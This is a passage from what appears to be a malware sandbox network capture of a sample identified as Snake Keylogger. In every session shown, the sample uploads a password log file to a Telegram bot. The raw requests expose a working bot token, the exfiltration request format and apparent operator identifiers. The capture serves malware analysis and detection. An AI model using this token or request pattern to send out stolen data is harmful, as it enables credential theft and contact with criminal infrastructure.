                            2022-06-26 07:33:42 UTC252INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66913,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228822,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            15192.168.2.549783149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:44 UTC25OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d7dd3d95
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:44 UTC25OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 37 64 64 33 64 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d7dd3d95Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:44 UTC26INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:44 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:44 UTC26INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66761,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228764,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            150192.168.2.550005149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:42 UTC253OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fa972b02
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:42 UTC253OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 61 39 37 32 62 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fa972b02Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:43 UTC254INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:42 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:43 UTC254INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66914,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228822,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            151192.168.2.550006149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:43 UTC255OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fada5b0d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:43 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 61 64 61 35 62 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fada5b0dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:43 UTC255INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:43 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:43 UTC256INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66915,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228823,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            152192.168.2.550007149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:43 UTC256OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fb1757f1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:43 UTC257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 62 31 37 35 37 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fb1757f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:43 UTC257INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:43 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:43 UTC257INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66916,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228823,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            153192.168.2.550008149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:43 UTC258OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fb546dbc
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:43 UTC258OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 62 35 34 36 64 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fb546dbcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:44 UTC259INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:44 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:44 UTC259INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66918,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228824,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            154192.168.2.550009149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:44 UTC260OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fb920edd
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:44 UTC260OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 62 39 32 30 65 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fb920eddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:44 UTC260INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:44 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:44 UTC261INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66919,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228824,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            155192.168.2.550010149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:45 UTC261OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fbfb8a63
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:45 UTC262OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 62 66 62 38 61 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fbfb8a63Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:45 UTC262INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:45 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:45 UTC262INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66921,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228825,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
